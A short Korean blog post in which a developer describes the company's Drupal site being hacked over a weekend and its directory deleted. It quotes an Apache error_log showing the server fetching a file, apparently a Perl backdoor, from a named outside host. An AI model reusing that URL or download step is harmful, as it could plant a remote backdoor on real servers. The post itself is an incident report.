주말에 해킹 당했네요.

음 주말 잘보내고 회사에 왔더니 홈페이지가 날아가버렸습니다.

듀로팔을 회사에서 개발한 프로그램 소개 및
개발자들간의 정보 공유를 위해 사용하고 있었는데
듀로팔 디렉토리를 싹 날려버렸더군요.

다행히 mysql 데이터베이스는 남아있어서 어느정도 수습은 가능하겠지만
아침에 좀 황당하더군요 ^^

어떻게 날린걸까 궁금해서 이리저리 로그를 찾아봤더니
httpd 의 error_log 를 보니 다음과 같은 로그가 남아있더군요

--05:49:56--  <a href="http://ulmeni.my1gb.com/bc.txt
" rel="nofollow">http://ulmeni.my1gb.com/bc.txt
</a>           => `bc.txt'
Resolving ulmeni.my1gb.com... 86.35.4.250
Connecting to ulmeni.my1gb.com[86.35.4.250]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 807 [text/plain]
 
    0K                                                       100%    7.70 MB/s
 
05:50:01 (7.70 MB/s) - `bc.txt' saved [807/807]

저 파일을 보니 perl 로 원격에서 접속할 수 있는 백도어를 열어주는 듯 하더군요.
apache 계정으로 돌고있어서 그나마 듀로팔만 날릴 수 있었겠지요;;

지금은 저 파일을 다운받는건 어떻게 실행했나.. 생각하고 있는중인데
파일을 업로드해서 실행시킨걸까.. 싶기도 하고..
그렇다면 php 설정 문제였는지 듀로팔 설정 문제였는지 모르겠네요.

아무튼 암스테르담에 사는 저 녀석 밉군요 -_-+